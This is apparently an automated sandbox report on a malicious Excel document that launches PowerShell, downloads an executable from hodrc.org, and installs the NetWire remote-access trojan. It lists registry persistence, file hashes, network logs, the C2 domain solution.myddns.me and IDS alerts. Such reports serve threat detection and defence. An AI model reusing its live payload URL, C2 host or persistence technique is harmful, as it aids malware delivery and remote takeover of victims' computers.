FC04000000000000040004000102070000000000010000004AAA8100350000006B507E000100000087DE8300030000008A838500D6250000A19F5E0001000000F4A4C30001000000FED37A0008000100000006000000007D7500F004000056737D00130100006B507E001A0000008A838500200000009829B70001000000AB19BB0006000000B087B40013010000E6C53100010004000000040000001A9CB2000100050000004200000016F0B200020008000000B63C7D06025FB500D07E01008A838500010009000000212F00008A838500010064000000889000008A8385000500650000001C0000001C955C00E80300008A8385007F0000009CA6B4003E010000A205060074F20100E6C53100020066000000A86100008A8385007E000000A2050600030067000000B63C7D06025FB500E02E00008A83850060000000A2050600020068000000E80300008A838500D3030000A20506000200690000008B030000025FB500384A00008A83850001006A000000B80B00008A838500
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General
LastAutoSavePurgeTime
26593741
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\26337AA2
26337AA2
04000000E4110000090000004100500050002D0045005800430045004C00000000000000000002600000000000000000000000000000A27A3326A27A33260000000000000000000000000000000000000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\26337AA2
26337AA2
04000000E4110000090000004100500050002D0045005800430045004C00000000000000000002600000000000000000000000000000A27A3326A27A332600000000E0020000002000000000000000000000000000000000000000000000000000002C0000000200000003000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9C0000009C0000005C040000850200005402010000000000B22E00000000000000000000BD0500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000E90500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F10500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000460700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F00600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000270800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000BD06000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009A0600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FC060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\26337AA2
26337AA2
04000000E4110000090000004100500050002D0045005800430045004C00000000000000000002600000000000000000000000000000A27A3326A27A332600000000E00200000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000BD0500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000E90500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F10500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000460700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F00600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000270800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000BD06000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009A0600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FC060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1948
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\196\52C64B7E
LanguageList
en-US
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
1948
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
0
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
0
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
1948
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
1948
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
1948
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
1948
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2752
solute.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2752
solute.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2752
solute.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2752
solute.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
1740
solu.exe
delete key
HKEY_CURRENT_USER\Software\NetWire
1740
solu.exe
write
HKEY_CURRENT_USER\Software\NetWire
HostId
solu
1740
solu.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
solu
C:\Users\admin\AppData\Roaming\solu\solu.exe
1740
solu.exe
write
HKEY_CURRENT_USER\Software\NetWire
Install Date
2020-07-24 20:55:51

Files activity

Executable files
2
Suspicious files
1
Text files
5
Unknown types
1

Dropped files

PID
Process
Filename
Type
2752
solute.exe
C:\Users\admin\AppData\Roaming\solu\solu.exe
executable
MD5: 91506bc2a51501164b6a2b0c18ad1c44
SHA256: b16b3d99441f078e081e2ac0a8f0121ce4dab264bf434e353d1e00a57e54d3aa
1948
powershell.exe
C:\Users\admin\AppData\Local\Temp\solute.exe
executable
MD5: 91506bc2a51501164b6a2b0c18ad1c44
SHA256: b16b3d99441f078e081e2ac0a8f0121ce4dab264bf434e353d1e00a57e54d3aa
4580
EXCEL.EXE
C:\Users\admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
xml
MD5: ad7c7878a2a9562233909b60dda482dd
SHA256: a76f0b3cb711829ec6b1fa57c74805610e30fdfd0a958ddf2389e4a5022ae939
4580
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
––
MD5:  ––
SHA256:  ––
4580
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z0B3631KDJ1WL4OLCXIM.temp
––
MD5:  ––
SHA256:  ––
4580
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: 9516c3bd39de4530bfc285db07b9fe9d
SHA256: 0028b93747e2a48f7df30a7a6a8a533169de60aec37c92255c239f5eff356a4a
1948
powershell.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
binary
MD5: 65bdd5145d97fa744eef1cb6762b6f6d
SHA256: d2025033ac5b23ed2bc7b8518ce20528781835c6c4c485a0aa1bed3b388acf4a
1948
powershell.exe
C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_x5qbth5m.rfy.psm1
––
MD5:  ––
SHA256:  ––
4580
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\.ses
text
MD5: c33ed3b632a8c623ea345a9b78d2524f
SHA256: 7256054b34b9dd3414ca30a35507f58cc4470e9885ba2f4ab3c33c21b547eea8
4580
EXCEL.EXE
C:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\C0E5D08C-4B40-44F8-AC52-044B8C0E498A
xml
MD5: a8f520b6746f3fa641a8b8342e819bcd
SHA256: 94d969f5fd76cc4e8fd4ed42864fc6b7ad9b9fcbb7fc9f39e21970648a8d4b6b
4580
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\LetterofIntent-Eckharthelicopter.xls.LNK
lnk
MD5: 0f58d7ee239e09ebc5980639c0d7eaa2
SHA256: 0739146fbe5404f541b3272a1f224cbb034da96de5f527e8da997e0de508c4d5
4580
EXCEL.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7OJ3GWE2MNKXM9VH8HAV.temp
––
MD5:  ––
SHA256:  ––
1948
powershell.exe
C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_j5m1lfzy.0oo.ps1
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
15
TCP/UDP connections
15
DNS requests
9
Threats
7

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
4580 EXCEL.EXE GET 200 13.107.42.23:443 https://config.edge.skype.com/config/v2/Office/excel/16.0.12026.20264/Production/CC?&Clientid=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&Application=excel&Platform=win32&Version=16.0.12026.20264&MsoVersion=16.0.12026.20194&Audience=Production&Build=ship&Architecture=x64&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&Channel=CC&InstallType=C2R&SessionId=%7b61BF321D-C30A-4492-9F75-7F82F56F1BC1%7d&LabMachine=false US
text
shared
1948 powershell.exe GET 200 45.40.135.135:80 http://hodrc.org/ot/solut.exe US
executable
suspicious
4580 EXCEL.EXE POST 200 52.114.128.70:443 https://self.events.data.microsoft.com/OneCollector/1.0/ US
binary
text
whitelisted
4580 EXCEL.EXE POST 200 52.114.128.70:443 https://self.events.data.microsoft.com/OneCollector/1.0/ US
binary
text
whitelisted
4580 EXCEL.EXE GET 200 52.109.76.6:443 https://officeclient.microsoft.com/config16/?lcid=1033&syslcid=1033&uilcid=1033&build=16.0.12026&crev=3 IE
xml
whitelisted
4580 EXCEL.EXE GET 200 52.109.8.19:443 https://nexusrules.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.12026.20264&ClientId=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&OSEnvironment=10&MsoAppId=1&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12026.20264& US
xml
whitelisted
4580 EXCEL.EXE POST 200 40.90.137.124:443 https://login.live.com/RST2.srf US
xml
xml
whitelisted
4580 EXCEL.EXE POST 200 40.90.137.124:443 https://login.live.com/ppsecure/deviceaddcredential.srf US
text
text
whitelisted
4580 EXCEL.EXE POST 200 40.90.137.124:443 https://login.live.com/RST2.srf US
xml
xml
whitelisted
4580 EXCEL.EXE POST 200 40.90.137.124:443 https://login.live.com/RST2.srf US
xml
xml
whitelisted
4580 EXCEL.EXE POST 200 40.90.137.124:443 https://login.live.com/RST2.srf US
xml
xml
whitelisted
4580 EXCEL.EXE POST 200 40.90.137.124:443 https://login.live.com/RST2.srf US
xml
xml
whitelisted
4580 EXCEL.EXE POST 200 40.90.137.124:443 https://login.live.com/RST2.srf US
xml
xml
whitelisted
4580 EXCEL.EXE POST 200 52.114.128.70:443 https://self.events.data.microsoft.com/OneCollector/1.0/ US
binary
text
whitelisted
4580 EXCEL.EXE GET 304 20.191.48.196:443 https://settings-win-ppe.data.microsoft.com/settings/v2.0/Storage/StorageHealthEvaluation?os=Windows&deviceClass=Windows.Desktop&appVer=1.0.0.0 US
––
––
whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
4580 EXCEL.EXE 13.107.42.23:443 Microsoft Corporation US suspicious
1948 powershell.exe 45.40.135.135:80 GoDaddy.com, LLC US suspicious
1740 solu.exe 185.165.153.158:2022 NL malicious
4580 EXCEL.EXE 52.109.76.6:443 Microsoft Corporation IE whitelisted
4580 EXCEL.EXE 52.109.8.19:443 Microsoft Corporation US whitelisted
–– –– 40.90.137.124:443 Microsoft Corporation US unknown
4580 EXCEL.EXE 52.114.128.70:443 Microsoft Corporation US unknown
–– –– 20.191.48.196:443 Microsoft Corporation US unknown

DNS requests

Domain IP Reputation
config.edge.skype.com 13.107.42.23
shared
hodrc.org 45.40.135.135
unknown
solution.myddns.me 185.165.153.158
malicious
officeclient.microsoft.com 52.109.76.6
whitelisted
nexusrules.officeapps.live.com 52.109.8.19
whitelisted
login.live.com 40.90.137.124
40.90.137.125
40.90.23.247
40.90.23.153
40.90.137.126
40.90.23.206
40.90.137.120
40.90.137.127
whitelisted
self.events.data.microsoft.com 52.114.6.47
52.114.128.70
whitelisted
settings-win-ppe.data.microsoft.com 20.191.48.196
whitelisted

Threats

PID Process Class Message
1948 powershell.exe Potential Corporate Privacy Violation ET POLICY PE EXE or DLL Windows file download HTTP
1948 powershell.exe Potentially Bad Traffic ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1740 solu.exe A Network Trojan was detected MALWARE [PTsecurity] Netwire.RAT
1740 solu.exe A Network Trojan was detected MALWARE [PTsecurity] Netwire.RAT
1740 solu.exe A Network Trojan was detected MALWARE [PTsecurity] Netwire.RAT

2 ETPRO signatures available at the full report

Debug output strings

Process Message
–– InitSideBySide failed create an activation context. Error: 1814
–– Invalid parameter passed to C runtime function.
–– Invalid parameter passed to C runtime function.